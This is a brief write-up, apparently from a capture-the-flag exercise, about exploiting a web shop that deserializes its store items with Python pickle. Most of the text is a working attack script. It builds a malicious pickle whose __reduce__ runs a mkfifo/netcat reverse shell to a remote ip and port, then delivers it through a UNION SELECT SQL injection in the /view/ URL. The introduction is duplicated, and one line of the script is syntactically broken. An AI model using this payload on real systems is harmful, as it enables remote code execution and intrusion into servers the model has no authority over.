That's how I exploited a website that was using python pickle and pickletools modules.
I wrote this writeup a long time ago and I am now sharing it with you.
The website provides 4 store items which can be visited from address/view/product where product is a number from 1 to 4. These 4 items are saved and read in and from the database using the python module “pickle”.
It is possible to create a python object and inject it with pickle to open a reverse shell on the machine:
I wrote this writeup a long time ago and I am now sharing it with you.
The website provides 4 store items which can be visited from address/view/product where product is a number from 1 to 4. These 4 items are saved and read in and from the database using the python module “pickle”.
It is possible to create a python object and inject it with pickle to open a reverse shell on the machine:
Python:
import pickle
import pickletools
import base64
import requests
class Payload:
def __reduce__(self):
import os
cmd = ("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh -i 2>&1 | nc ip port >/tmp/f") #remote ip and port to open the reverse shell
return os.system, (cmd,)
pickled = pickle.dumps(Payload())
pickletools.dis(pickled)
p64 = base64.b64encode(pickled).decode()
ip,port = #ip and port
conn = requests.Session()
exploit = "' UNION SELECT '%s' -- "%p64
a = requests.utils.requote_uri(exploit)
url = "http://%s:%d/view/%s"%(ip,port,a)
resp = conn.get(url,allow_redirects=True)
conn.close()